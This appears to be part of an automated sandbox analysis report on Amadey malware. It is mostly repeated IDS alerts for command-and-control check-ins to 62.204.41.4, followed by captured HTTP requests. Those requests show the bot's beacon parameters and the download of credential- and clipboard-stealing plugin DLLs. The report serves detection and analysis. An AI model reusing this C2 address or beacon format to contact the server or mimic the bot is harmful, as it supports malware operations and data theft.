                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50030 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50031 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50032 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50033 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50034 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50035 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50036 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50037 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50038 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50039 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50040 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50041 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50042 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50043 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50044 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50045 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50046 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50047 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50048 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50049 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50050 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50051 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50052 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50053 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50054 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50055 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50056 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50057 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50058 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50059 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50060 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50061 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50062 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50063 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50064 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50066 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50067 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50068 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50069 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50070 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50071 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50072 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50073 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50074 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50075 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50076 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50077 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50078 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50079 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50080 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50081 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50082 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50083 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50084 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50085 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50086 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50087 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50088 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50089 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50090 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50091 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50092 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50093 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50094 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50095 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50096 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50097 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50098 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50099 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50100 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50101 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50102 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50103 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50104 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50105 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50106 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50107 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50108 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50109 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50110 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50111 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50112 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50113 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50114 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50115 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50116 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50117 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50118 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50119 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50120 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50121 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50122 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50123 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50124 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50125 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50126 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50127 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50128 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50129 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50130 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50131 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50132 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50133 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50134 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50135 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50136 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50137 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50138 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50139 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50140 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50141 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50142 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50143 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50144 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50145 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50146 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50147 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50148 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50149 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50150 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50151 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50152 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50153 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50154 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50155 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50156 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50157 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50158 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50159 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50160 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50161 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50162 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50163 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50164 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50165 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50166 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50167 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50168 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50169 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50170 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50171 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50172 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50173 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50174 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50175 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50176 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50177 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50178 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50179 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50180 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50182 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50183 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50184 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50185 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50186 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50187 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50188 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50189 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50190 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50191 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50192 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50193 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50194 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50195 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50196 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50197 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50198 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50199 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50200 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50201 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50202 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50203 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50204 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50205 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50206 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50207 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50208 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50209 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50210 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50211 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50212 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50213 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50214 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50215 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50216 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50217 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50218 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50219 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50220 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50221 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50222 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50223 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50224 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50225 -> 62.204.41.4:80
                          Source: Malware configuration extractorURLs: 62.204.41.4/Gol478Ns/index.php
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 90Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
